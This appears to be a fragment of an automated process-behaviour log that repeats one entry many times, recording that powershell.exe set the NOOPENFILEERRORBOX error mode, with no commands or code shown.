                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
